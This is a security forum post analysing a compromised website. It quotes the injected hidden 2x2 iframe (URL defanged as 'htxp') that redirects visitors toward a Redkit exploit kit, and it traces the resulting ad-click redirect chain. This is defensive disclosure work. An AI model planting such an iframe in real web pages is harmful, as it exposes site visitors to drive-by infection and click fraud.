This one was reported by our forum friend, Pondus, who allways has an eye for the non-detects. Thanks, Pondus.
http://urlquery.net/report.php?id=1118959IDS alerts for:
ET CURRENT_EVENTS Malicious iframe &
EXPLOIT-KIT Redkit exploit kit redirection attempt
https://www.virustotal.com/nb/file/4a9907865783bb55926adbba34c27dbb79052ae149378c42faacf768112a4cc8/analysis/1361811247/Well done, Pondus, because look here on the website code:
in line 138:
< iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=htxp://hopeglobalfoundation.org/eyib.html?i=1863612> < /iframe>
Note: Name=Twitter ? That looks suspicious!
< /body> While it again is going to pagead2.googlesyndication.com/apps/domainpark/ads.js How see: -http://jsunpack.jeek.org/dec/go?report=1c409a10917068951e044310e5d28ce80b29672e (only for the security aware with NoScript and RequestPolicy add-ons active and in a VM/sandbox)
So there is quite an amount of domainparked search clicks scored through the redirect via mentioned iFrame
Should be reported to virus AT avast dot com
Going to the redirect NoScript protects showing:
-http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js
-http://hopeglobalfoundation.org/text/javascript
-http://dsnextgen.com/?domainname=
-http://www.google.com/
It can be worse even, as e.g. "htxp://static.verticalscope.com/apps/domainpark/show_afd_ads.js" is identified as associated with a keylogger ->
ThreatExpert Report: Trojan-Spy.Win32.VB, Trojan-Spy.Win32.VB.coq
Sites like these should be flagged, like
http://urlquery.net/report.php?id=1113456 and
http://urlquery.net/report.php?id=1086430polonus
